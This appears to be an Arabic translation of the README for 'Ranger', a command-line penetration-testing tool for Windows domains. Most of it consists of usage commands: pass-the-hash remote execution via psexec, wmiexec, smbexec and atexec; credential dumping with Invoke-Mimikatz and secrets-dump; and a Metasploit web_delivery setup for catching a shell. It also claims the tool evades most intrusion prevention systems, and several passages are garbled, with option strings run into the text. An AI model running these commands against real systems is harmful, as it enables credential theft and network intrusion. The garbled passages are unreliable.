
أداة لمحترفي الأمان للوصول والتفاعل مع أنظمة مايكروسوفت ويندوز البعيدة.
أداة لدعم محترفي الأمن للوصول والتفاعل مع أنظمة مايكروسوفت ويندوز البعيدة.
تم تصميم هذا المشروع بناءً على فكرة أننا لم نخترع القوس أو السهم، بل فقط طريقة أكثر فعالية لاستخدامهما.
Ranger هو أداة هجوم واختبار اختراق تعمل عبر سطر الأوامر، ولديها القدرة على استخدام خادم مقلاع (catapult server) مُفعَّل لتوصيل القدرات الهجومية ضد أنظمة ويندوز. طالما أن المستخدم لديه مجموعة من بيانات الاعتماد أو مجموعة تجزئة (NTLM, LM, LM:NTLM)، يمكنه الوصول إلى الأنظمة التي هي جزء من مجال الثقة.
باستخدام هذه الإمكانية، يمكن لمحترف الأمن استخراج بيانات الاعتماد من الذاكرة بنص واضح، والوصول إلى جداول SAM، وتنفيذ الأوامر، وتشغيل سكريبتات PowerShell، وثنائيات ويندوز، وأدوات أخرى. في الوقت الحالي، تتجاوز الأداة معظم حلول البائعين لأنظمة منع الاختراق (IPS) ما لم يتم ضبطها خصيصًا لاكتشافها. تم تطوير الأداة باستخدام مختبراتنا المنزلية في محاولة لدعم محترفي الأمن في القيام بأنشطة قانونية و/أو تعاقدية مدعومة.
يتم إضافة المزيد من الوظائف، لكن في الوقت الحالي تستخدم الأداة المساهمات المجتمعية من المستودعات المتعلقة بفرق PowerView في PowerShell، وMimikatz في PowerShell، وImpacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
ranger.py --invoker -q -v -vv -vvv
ranger.py --downloader -q -v -vv -vvv
ranger.py --executor -q -v -vv -vvv
--get-domain-membership--domain الاختياري، والذي يتيح لك استهداف مجال مختلف عن الذي سجلت الدخول إليهranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
-d، فسيستنتج أنك تريد تجاهل جميع أسماء المجالات الموجودة في الملف.password
LM:NTLM
:NTLM
PWDUMP
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xmlt في الأوامر بـ e-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml-f-a-f و-a إذا كنت تريد تغيير الأمر، لتجنب استخدام -a يمكنك استخدام Executor-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x-f-a إذا كانت الأداة تتطلب ذلك-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x "im.ps1" -f "Invoke-Mimikatz -DumpCredsuse exploit/multi/script/web_delivery
set targets 2
set payload <اختر الحمولة التي تريدها>
set lhost <عنوان IP الخاص بك>
set lport <منفذ للشيل تأكد من أنه ليس منفذًا متعارضًا>
set URIPATH /
set SRVPORT <نفس ما تم تعيينه بواسطة الخيار -r في ranger، الافتراضي هو 8888>
exploit -j
أحصل على أخطاء رفض الوصول في أجهزة ويندوز التي هي جزء من WORKGROUP.
عندما لا تكون جزءًا من مجال، لا تحتوي ويندوز افتراضيًا على أي مشاركات إدارية. يعتمد SMBEXEC على تمكين المشاركات. بالإضافة إلى ذلك، WMIC غير ممكنة على أجهزة WORKGROUP. صُمم SMBEXEC وWMIEXEC لاستهداف البروتوكولات الممكنة على أنظمة المجال. بينما من الممكن بالتأكيد تمكين هذه الوظائف على نظام WORKGROUP، لاحظ أنك تقدم بروتوكولات ضعيفة (بعد كل شيء، هذا ما صُممت هذه الأداة لمهاجمته). تمكين هذه الميزات على نظام منزلك الرئيسي الذي يستخدمه شريكك لفيسبوك أيضًا ليس فكرة جيدة على الأرجح.
enum4linux ثم استخدام الوسيطة --share share_name في ranger لمحاولة تنفيذ SMBEXEC.https://pypi.python.org/pypi/colorama[BSides Charm City 2016: 23 أبريل 2016] (http://2016.bsidescharm.com/2016-talks/ranger-it-just-takes-one-account-to-take-down-an-enterprise)
[فيديو] (https://youtu.be/HrXTrPzdR2Q?list=PL0YXeUocWA4NAGPmYdKNmQEh8H6iL_4Ik)
[Black Arch Linux] (https://blackarch.org/)